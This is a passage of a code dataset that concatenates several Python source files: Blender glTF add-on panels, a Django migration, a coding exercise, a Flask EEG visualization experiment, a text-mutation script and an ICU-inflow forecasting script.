bl_region_type = 'TOOL_PROPS'\n bl_label = \"\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'HIDE_HEADER'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_format')\n if operator.export_format == 'GLTF_SEPARATE':\n layout.prop(operator, 'export_keep_originals')\n if operator.export_keep_originals is False:\n layout.prop(operator, 'export_texture_dir', icon='FILE_FOLDER')\n\n layout.prop(operator, 'export_copyright')\n layout.prop(operator, 'will_save_settings')\n\n\nclass GLTF_PT_export_include(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Include\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n col = layout.column(heading = \"Limit to\", align = True)\n col.prop(operator, 'use_selection')\n col.prop(operator, 'use_visible')\n col.prop(operator, 'use_renderable')\n col.prop(operator, 'use_active_collection')\n\n col = layout.column(heading = \"Data\", align = True)\n col.prop(operator, 'export_extras')\n col.prop(operator, 'export_cameras')\n col.prop(operator, 'export_lights')\n\n\nclass GLTF_PT_export_transform(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Transform\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_yup')\n\n\nclass GLTF_PT_export_geometry(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Geometry\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_apply')\n layout.prop(operator, 'export_texcoords')\n layout.prop(operator, 'export_normals')\n col = layout.column()\n col.active = operator.export_normals\n col.prop(operator, 'export_tangents')\n layout.prop(operator, 'export_colors')\n\n col = layout.column()\n col.prop(operator, 'use_mesh_edges')\n col.prop(operator, 'use_mesh_vertices')\n\n layout.prop(operator, 'export_materials')\n col = layout.column()\n col.active = operator.export_materials == \"EXPORT\"\n col.prop(operator, 'export_image_format')\n\n\nclass GLTF_PT_export_geometry_compression(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Compression\"\n bl_parent_id = \"GLTF_PT_export_geometry\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def __init__(self):\n from io_scene_gltf2.io.com import gltf2_io_draco_compression_extension\n self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists(quiet=True)\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n if operator.is_draco_available:\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_draco_mesh_compression_enable\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_draco_mesh_compression_enable\n layout.prop(operator, 'export_draco_mesh_compression_level')\n\n col = layout.column(align=True)\n col.prop(operator, 'export_draco_position_quantization', text=\"Quantize Position\")\n col.prop(operator, 'export_draco_normal_quantization', text=\"Normal\")\n col.prop(operator, 'export_draco_texcoord_quantization', text=\"Tex Coord\")\n col.prop(operator, 'export_draco_color_quantization', text=\"Color\")\n col.prop(operator, 'export_draco_generic_quantization', text=\"Generic\")\n\n\nclass GLTF_PT_export_animation(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Animation\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_current_frame')\n\n\nclass GLTF_PT_export_animation_export(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Animation\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_animations\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_animations\n\n layout.prop(operator, 'export_frame_range')\n layout.prop(operator, 'export_frame_step')\n layout.prop(operator, 'export_force_sampling')\n layout.prop(operator, 'export_nla_strips')\n\n row = layout.row()\n row.active = operator.export_force_sampling\n row.prop(operator, 'export_def_bones')\n\n\nclass GLTF_PT_export_animation_shapekeys(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Shape Keys\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_morph\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_morph\n\n layout.prop(operator, 'export_morph_normal')\n col = layout.column()\n col.active = operator.export_morph_normal\n col.prop(operator, 'export_morph_tangent')\n\n\nclass GLTF_PT_export_animation_skinning(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Skinning\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_skins\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_skins\n layout.prop(operator, 'export_all_influences')\n\nclass GLTF_PT_export_user_extensions(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Exporter Extensions\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\" and operator.has_active_exporter_extensions\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\nclass GLTF_PT_import_user_extensions(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Importer Extensions\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n return operator.bl_idname == \"IMPORT_SCENE_OT_gltf\" and operator.has_active_importer_extensions\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\nclass ExportGLTF2(bpy.types.Operator, ExportGLTF2_Base, ExportHelper):\n \"\"\"Export scene as glTF 2.0 file\"\"\"\n bl_idname = 'export_scene.gltf'\n bl_label = 'Export glTF 2.0'\n\n filename_ext = ''\n\n filter_glob: StringProperty(default='*.glb;*.gltf', options={'HIDDEN'})\n\n\ndef menu_func_export(self, context):\n self.layout.operator(ExportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')\n\n\nclass ImportGLTF2(Operator, ImportHelper):\n \"\"\"Load a glTF 2.0 file\"\"\"\n bl_idname = 'import_scene.gltf'\n bl_label = 'Import glTF 2.0'\n bl_options = {'REGISTER', 'UNDO'}\n\n filter_glob: StringProperty(default=\"*.glb;*.gltf\", options={'HIDDEN'})\n\n files: CollectionProperty(\n name=\"File Path\",\n type=bpy.types.OperatorFileListElement,\n )\n\n loglevel: IntProperty(\n name='Log Level',\n description=\"Log Level\")\n\n import_pack_images: BoolProperty(\n name='Pack Images',\n description='Pack all images into .blend file',\n default=True\n )\n\n merge_vertices: BoolProperty(\n name='Merge Vertices',\n description=(\n 'The glTF format requires discontinuous normals, UVs, and '\n 'other vertex attributes to be stored as separate vertices, '\n 'as required for rendering on typical graphics hardware. '\n 'This option attempts to combine co-located vertices where possible. '\n 'Currently cannot combine verts with different normals'\n ),\n default=False,\n )\n\n import_shading: EnumProperty(\n name=\"Shading\",\n items=((\"NORMALS\", \"Use Normal Data\", \"\"),\n (\"FLAT\", \"Flat Shading\", \"\"),\n (\"SMOOTH\", \"Smooth Shading\", \"\")),\n description=\"How normals are computed during import\",\n default=\"NORMALS\")\n\n bone_heuristic: EnumProperty(\n name=\"Bone Dir\",\n items=(\n (\"BLENDER\", \"Blender (best for re-importing)\",\n \"Good for re-importing glTFs exported from Blender. \"\n \"Bone tips are placed on their local +Y axis (in glTF space)\"),\n (\"TEMPERANCE\", \"Temperance (average)\",\n \"Decent all-around strategy. \"\n \"A bone with one child has its tip placed on the local axis \"\n \"closest to its child\"),\n (\"FORTUNE\", \"Fortune (may look better, less accurate)\",\n \"Might look better than Temperance, but also might have errors. \"\n \"A bone with one child has its tip placed at its child's root. \"\n \"Non-uniform scalings may get messed up though, so beware\"),\n ),\n description=\"Heuristic for placing bones. Tries to make bones pretty\",\n default=\"TEMPERANCE\",\n )\n\n guess_original_bind_pose: BoolProperty(\n name='Guess Original Bind Pose',\n description=(\n 'Try to guess the original bind pose for skinned meshes from '\n 'the inverse bind matrices. '\n 'When off, use default/rest pose as bind pose'\n ),\n default=True,\n )\n\n def draw(self, context):\n layout = self.layout\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n layout.prop(self, 'import_pack_images')\n layout.prop(self, 'merge_vertices')\n layout.prop(self, 'import_shading')\n layout.prop(self, 'guess_original_bind_pose')\n layout.prop(self, 'bone_heuristic')\n\n def invoke(self, context, event):\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n if hasattr(sys.modules[addon_name], 'glTF2ImportUserExtension') or hasattr(sys.modules[addon_name], 'glTF2ImportUserExtensions'):\n importer_extension_panel_unregister_functors.append(sys.modules[addon_name].register_panel())\n except Exception:\n pass\n\n self.has_active_importer_extensions = len(importer_extension_panel_unregister_functors) > 0\n return ImportHelper.invoke(self, context, event)\n\n def execute(self, context):\n return self.import_gltf2(context)\n\n def import_gltf2(self, context):\n import os\n\n self.set_debug_log()\n import_settings = self.as_keywords()\n\n user_extensions = []\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n module = sys.modules[addon_name]\n except Exception:\n continue\n if hasattr(module, 'glTF2ImportUserExtension'):\n extension_ctor = module.glTF2ImportUserExtension\n user_extensions.append(extension_ctor())\n import_settings['import_user_extensions'] = user_extensions\n\n if self.files:\n # Multiple file import\n ret = {'CANCELLED'}\n dirname = os.path.dirname(self.filepath)\n for file in self.files:\n path = os.path.join(dirname, file.name)\n if self.unit_import(path, import_settings) == {'FINISHED'}:\n ret = {'FINISHED'}\n return ret\n else:\n # Single file import\n return self.unit_import(self.filepath, import_settings)\n\n def unit_import(self, filename, import_settings):\n import time\n from .io.imp.gltf2_io_gltf import glTFImporter, ImportError\n from .blender.imp.gltf2_blender_gltf import BlenderGlTF\n\n try:\n gltf_importer = glTFImporter(filename, import_settings)\n gltf_importer.read()\n gltf_importer.checks()\n\n print(\"Data are loaded, start creating Blender stuff\")\n\n start_time = time.time()\n BlenderGlTF.create(gltf_importer)\n elapsed_s = \"{:.2f}s\".format(time.time() - start_time)\n print(\"glTF import finished in \" + elapsed_s)\n\n gltf_importer.log.removeHandler(gltf_importer.log_handler)\n\n return {'FINISHED'}\n\n except ImportError as e:\n self.report({'ERROR'}, e.args[0])\n return {'CANCELLED'}\n\n def set_debug_log(self):\n import logging\n if bpy.app.debug_value == 0:\n self.loglevel = logging.CRITICAL\n elif bpy.app.debug_value == 1:\n self.loglevel = logging.ERROR\n elif bpy.app.debug_value == 2:\n self.loglevel = logging.WARNING\n elif bpy.app.debug_value == 3:\n self.loglevel = logging.INFO\n else:\n self.loglevel = logging.NOTSET\n\n\ndef menu_func_import(self, context):\n self.layout.operator(ImportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')\n\n\nclasses = (\n ExportGLTF2,\n GLTF_PT_export_main,\n GLTF_PT_export_include,\n GLTF_PT_export_transform,\n GLTF_PT_export_geometry,\n GLTF_PT_export_geometry_compression,\n GLTF_PT_export_animation,\n GLTF_PT_export_animation_export,\n GLTF_PT_export_animation_shapekeys,\n GLTF_PT_export_animation_skinning,\n GLTF_PT_export_user_extensions,\n ImportGLTF2,\n GLTF_PT_import_user_extensions\n)\n\n\ndef register():\n for c in classes:\n bpy.utils.register_class(c)\n # bpy.utils.register_module(__name__)\n\n # add to the export / import menu\n bpy.types.TOPBAR_MT_file_export.append(menu_func_export)\n bpy.types.TOPBAR_MT_file_import.append(menu_func_import)\n\n\ndef unregister():\n for c in classes:\n bpy.utils.unregister_class(c)\n for f in exporter_extension_panel_unregister_functors:\n f()\n exporter_extension_panel_unregister_functors.clear()\n\n for f in importer_extension_panel_unregister_functors:\n f()\n importer_extension_panel_unregister_functors.clear()\n\n # bpy.utils.unregister_module(__name__)\n\n # remove from the export / import menu\n bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)\n bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)\n","sub_path":"addons/io_scene_gltf2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":42290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69233679","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('icekit_events', '0005_auto_20161024_1742'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventType',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('slug', models.SlugField(max_length=255)),\n ('is_public', models.BooleanField(default=True, help_text=b\"Public types are displayed to the public, e.g. 'talk', 'workshop', etc. Non-public types are used to indicate special behaviour, such as education or members events.\", verbose_name=b'Show to public?')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='eventbase',\n name='primary_type',\n field=models.ForeignKey(to='icekit_events.EventType', blank=True, related_name='events', help_text=b'The primary type of this event: Talk, workshop, etc. Only public Event Types can be primary.', null=True),\n ),\n migrations.AddField(\n model_name='eventbase',\n name='secondary_types',\n field=models.ManyToManyField(related_name='secondary_events', to='icekit_events.EventType', help_text=b'Additional/internal types: Education or members events, for example.', blank=True),\n ),\n ]\n","sub_path":"icekit_events/migrations/0006_auto_20161107_1747.py","file_name":"0006_auto_20161107_1747.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50499434","text":"from collections import deque\n\nn_of_materials = list(map(int, input().split()))\nmagic_values = deque(map(int, input().split()))\n\ndd = {'Doll': 0, 'Wooden train': 0, 'Teddy bear': 0, 'Bicycle': 0}\nwhile len(magic_values) > 0 and len(n_of_materials) > 0:\n material_value = n_of_materials.pop()\n magic_value = magic_values.popleft()\n result = material_value * magic_value\n if result == 0:\n if magic_value == 0 and material_value > 0:\n n_of_materials.append(material_value)\n elif magic_value > 0 and material_value == 0:\n magic_values.appendleft(magic_value)\n elif result < 0:\n result = material_value + magic_value\n n_of_materials.append(result)\n elif result == 400:\n dd['Bicycle'] += 1\n elif result == 300:\n dd['Teddy bear'] += 1\n elif result == 250:\n dd['Wooden train'] += 1\n elif result == 150:\n dd['Doll'] += 1\n elif result > 0:\n result = material_value + 15\n n_of_materials.append(result)\n\nbear_bicycle = 0\ndoll_train = 0\n\nfor k,v in dd.items():\n if k == 'Doll' or k == 'Wooden train':\n if v > 0:\n bear_bicycle += 1\n elif k == 'Teddy bear' or k == 'Bicycle':\n if v > 0:\n doll_train += 1\nif bear_bicycle > 1 or doll_train > 1:\n print(\"The presents are crafted! Merry Christmas!\")\nelse:\n print(\"No presents this Christmas!\")\n\nn_of_materials = list(map(str, n_of_materials))\nmagic_values = list(map(str, magic_values))\n\nif len(n_of_materials) > 0:\n print(f'Materials left: {\", \".join(list(reversed(n_of_materials)))}')\nif len(magic_values) > 0:\n print(f'Magic left: {\", \".join(list(magic_values))}')\n\nfor key, value in sorted(dd.items()):\n if not value == 0:\n print(f'{key}: {value}')","sub_path":"Python Advanced Exam Preparation - 17 February 2020/santa's_present_factory.py","file_name":"santa's_present_factory.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"315045673","text":"from flask import Flask, render_template, request\nfrom itertools import product\nimport random\nimport os\nimport pandas as pd\nimport time\nfrom static.libs.record import *\n\n'''\nInject Marker\nmark0: rest\nmark1: eval\nmark2: save\nother: vis\n'''\n\napp = Flask(__name__)\n\nglobal tasks\nglobal taskCount\nglobal userAnswer\nglobal names\n\ntaskCount = -1\nuserAnswer = {}\n\ndef makeTask():\n df = pd.read_csv('static/data/task.csv', encoding='CP949')\n vis = ['bar', 'line', 'scatter', 'map']\n #task = ['Task1', 'Task2', 'Task3'] #A\n #task = ['Task1', 'Task2', 'Task4'] #B\n #task = ['Task1', 'Task3', 'Task4'] #C\n #task = ['Task2', 'Task3', 'Task4'] #D\n task = ['Task1', 'Task2', 'Task3', 'Task4'] #E\n design = ['shape', 'size', 'color']\n\n vis_marker = {'scatter':100, 'bar':200, 'line':300, 'map':400}\n task_marker = {'1':10, '2':20, '3':30, '4':40}\n design_marker = {'base':1, 'color':2, 'shape':3, 'size':4}\n\n items = [vis, task, design]\n result = list(product(*items))\n\n directoryList = []\n motherDirectory = 'templates/'\n defaultDirectory = 'vis/'\n for r in result:\n directory = motherDirectory + defaultDirectory + r[0] + '/' + r[1] + '/' + r[2] + '/'\n baseDirectory = motherDirectory + defaultDirectory + r[0] + '/' + r[1] + '/' + 'base/'\n\n files = os.listdir(directory)\n idx = random.randrange(0, 2)\n selectFile = files[idx] #current directory select\n baseFile = files[1-idx] #base directory select\n\n subdf = df[(df['vis']==r[0])&(df['taskNum']==int(r[1][-1]))&(df['type']==r[2])]\n basetask = subdf[subdf['filename'] == baseFile.replace('.html', '')]['task'].values.tolist()[0]\n selecttask = subdf[subdf['filename'] == selectFile.replace('.html', '')]['task'].values.tolist()[0]\n\n selectFileDirectory = directory.replace(motherDirectory, '') + selectFile\n baseFileDirectory = baseDirectory.replace(motherDirectory, '') + baseFile\n\n baseMarker = vis_marker[r[0]] + task_marker[r[1][-1]] + design_marker['base']\n selectMarker = vis_marker[r[0]] + task_marker[r[1][-1]] + design_marker[r[2]]\n\n directoryList.append((baseFileDirectory, basetask, baseMarker))\n directoryList.append((selectFileDirectory, selecttask, selectMarker))\n\n random.shuffle(directoryList)\n print(len(directoryList))\n return directoryList\n\nglobal testcount\nglobal testTasks\nglobal saveCount\ntestcount = -1\ntestTasks = []\nsaveCount = -1\n\ndef makeTestTask():\n global testTasks\n\n test_df = pd.read_csv('static/data/test_task.csv', encoding='CP949')\n motherDirectory = 'templates/'\n testDirectory = 'test/'\n\n test_file_list = os.listdir(motherDirectory + testDirectory.replace('/', ''))\n for file in test_file_list:\n subdf = test_df[test_df['filename'] == file.replace('.html', '')]\n path = testDirectory + file\n task = subdf['task'].values.tolist()[0]\n sublist = (path, task)\n testTasks.append(sublist)\n\n@app.route('/')\ndef hello_world():\n global tasks\n\n makeTestTask()\n directoryList = makeTask()\n tasks = directoryList\n\n return render_template('index.html')\n\n@app.route('/test', methods=['POST'])\ndef test():\n global testTasks\n global testcount\n\n if request.method=='POST':\n print('test')\n testcount += 1\n\n if testcount >= 0:#len(testTasks):\n return render_template('index_real.html')\n else:\n return render_template(testTasks[testcount][0], task=testTasks[testcount][1], link='/testNasa')\n\n@app.route('/testNasa', methods=['POST'])\ndef testNasa():\n return render_template('NASA-TLX_test.html', link='/testRest')\n\n@app.route('/testRest', methods=['POST'])\ndef testRest():\n return render_template('rest_test.html', link='/test')\n\n@app.route('/next', methods=['POST'])\ndef next():\n global tasks\n global taskCount\n global userAnswer\n global names\n global saveCount\n\n if request.method == 'POST':\n userName = request.form.get('search')\n if userName != None:\n print('Rest')\n startRecording(userName)\n injectMarker(0)\n userAnswer['name'] = userName\n userAnswer['value'] = {}\n\n taskCount += 1\n saveCount += 1\n if taskCount >= 2:#len(tasks):\n injectMarker(2)\n print('End')\n print(userAnswer)\n return render_template('end.html', link='/save')\n elif saveCount == 1:#10:\n print('Save Temp')\n print(userAnswer)\n injectMarker(2)\n taskCount -= 1\n return render_template('data_save.html', link='/save_temp')\n else:\n injectMarker(tasks[taskCount][2])\n print('VisCount', taskCount)\n print('Vis', tasks[taskCount][2])\n print(userAnswer)\n\n return render_template(tasks[taskCount][0], task=tasks[taskCount][1], link='/NASA')\n\n@app.route('/save_temp', methods=['POST'])\ndef save_temp():\n global tasks\n global taskCount\n global userAnswer\n global saveCount\n\n if request.method == 'POST':\n print('Save Temp')\n data = pd.DataFrame(userAnswer['value'])\n path = 'C:/EEG data/EuroVis/UserData/' + userAnswer['name']\n\n try:\n if not os.path.exists(path):\n os.makedirs(path)\n except OSError:\n pass\n\n dataName = 'ans_' + str(taskCount)\n data.T.to_csv(path + '/' + dataName + '.csv', encoding='CP949')\n saveCount = -1\n\n return render_template('rerun.html', link='/next')\n\n@app.route('/save', methods=['POST'])\ndef save_data():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method == 'POST':\n print('Save')\n data = pd.DataFrame(userAnswer['value'])\n path = 'C:/EEG data/EuroVis/UserData/' + userAnswer['name']\n\n if taskCount == len(tasks):\n try:\n if not os.path.exists(path):\n os.makedirs(path)\n except OSError:\n pass\n\n data.T.to_csv(path + '/' + 'ans_end.csv', encoding='CP949')\n stopRecording()\n\n@app.route('/rest', methods=['POST'])\ndef rest():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method == 'POST':\n injectMarker(0)\n print('Rest')\n task_split = tasks[taskCount][0].split('/')\n task_index = task_split[1] + '_' + task_split[2] + '_' + task_split[3] + '_' + task_split[4].replace('.html','')\n NASA_col = ['Mental', 'Physical', 'Temporal', 'Effort', 'Performance', 'Frustration']\n for col in NASA_col:\n userAnswer['value'][task_index][col] = request.form.get(col).replace('[POST]> ', '')\n\n return render_template('rest.html', link='/next')\n\n@app.route('/NASA', methods=['POST'])\ndef nasa():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method=='POST':\n injectMarker(1)\n print('Eval')\n task_split = tasks[taskCount][0].split('/')\n task_index = task_split[1] + '_' + task_split[2] + '_' + task_split[3] + '_' + task_split[4].replace('.html', '')\n\n userAnswer['value'][task_index] = {}\n ans = request.form.get('answer')\n if ans==None:\n userAnswer['value'][task_index]['Answer'] = 'Task 3'\n else:\n userAnswer['value'][task_index]['Answer'] = ans.replace('[POST]> ', '')\n\n userAnswer['value'][task_index]['marker'] = tasks[taskCount][2]\n return render_template('NASA-TLX.html', link='/rest')\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"EEG/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"646796145","text":"#!/usr/bin/env python3\n\"\"\"Telephone\"\"\"\n\nimport argparse\nimport os\nimport random\nimport string\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Telephone',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('text', metavar='text', help='Input text or file')\n\n parser.add_argument('-s',\n '--seed',\n help='Random seed',\n metavar='seed',\n type=int,\n default=None)\n\n parser.add_argument('-m',\n '--mutations',\n help='Percent mutations',\n metavar='mutations',\n type=float,\n default=0.1)\n\n args = parser.parse_args()\n\n if not 0 <= args.mutations <= 1:\n parser.error(f'--mutations \"{args.mutations}\" must be between 0 and 1')\n\n if os.path.isfile(args.text):\n args.text = open(args.text).read().rstrip()\n\n return args\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n text = args.text\n random.seed(args.seed)\n alpha = ''.join(sorted(string.ascii_letters + string.punctuation))\n len_text = len(text)\n num_mutations = round(args.mutations * len_text)\n new_text = text\n\n for i in random.sample(range(len_text), num_mutations):\n new_char = random.choice(alpha.replace(new_text[i], ''))\n new_text = new_text[:i] + new_char + new_text[i + 1:]\n\n print(f'You said: \"{text}\"\\nI heard : \"{new_text}\"')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"10_telephone/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130326581","text":"\n\"\"\"\nFile that runs LCPS model\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\nsys.path.append(\"Python\")\nfrom cross_validation import BlockingTimeSeriesSplitLCPS\nfrom Models_LCPS import gridsearch_LCPS, rolling_pred_LCPS, LCPSModel\n\n# load data\ndata = pd.read_csv(\"Data/data.csv\")\ndata.date = pd.to_datetime(data.date, format='%Y-%m-%d')\ndata = data.sort_values(by='date', ascending=True)\n\n# create weekday variable.\n# 0 is Monday, ..., 6 is Sunday\ndata['weekday'] = data.date.dt.weekday\n\ny = data.ICU_Inflow.values\nw = data.weekday.values\n\n# Split data set into testing and training set. 80% in training set (arbitrary\n# choice)\n\nsplit_pct = 0.8\ny_train = y[:int(y.shape[0] * split_pct)]\ny_test = y[int(y.shape[0] * split_pct):]\nw_train = w[:int(y.shape[0] * split_pct)]\nw_test = w[int(y.shape[0] * split_pct):]\n\n\nbtscv = BlockingTimeSeriesSplitLCPS(n_splits=5)\n\n# splits_list is a list of dictionaries, where each dictionary is a fold\n# the dictionary contains the start and stop indices for the train set\n# and the start and stop indices for the validation set\nsplits_list = btscv.return_split(y_train)\n\n# first rough search for the smoothing parameter using blocktimeseries split\ngrid_1 = np.arange(0, 101, 0.5)\nopt_lambda_1, average_mae_per_par_1 = gridsearch_LCPS(y, w, splits_list, grid=grid_1)\n\nprint(opt_lambda_1)\n\n# Plot graph to inspect where low points of the mae are\nplt.plot(grid_1, average_mae_per_par_1.values(), label='MAE')\nplt.xlabel('Lambda')\nplt.ylabel('MAE')\naxes = plt.gca()\naxes.set_xlim([0, 100])\nplt.legend()\nplt.show()\n\n# More sophisticated search\n# define the grid\ngrid_2 = np.arange(3, 10, 0.01)\n\nopt_lambda_2, average_mae_per_par_2 = gridsearch_LCPS(y, w, splits_list, grid=grid_2)\n\nprint(opt_lambda_2)\n\n# compute rolling predictions based on\ny_pred = rolling_pred_LCPS(LCPSModel, y_train, y_test, w_train, w_test, t=1, gamma=opt_lambda_2)\n\n# save predictions to text file\nfilename = 'y_pred_rolling_LCPS.txt'\nwith open(filename, 'w') as file_object:\n file_object.write(str(y_pred))\n","sub_path":"Python/perform_LCPS.py","file_name":"perform_LCPS.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"521588628","text":"#!/usr/bin/env python\n# -*- coding: utf-8 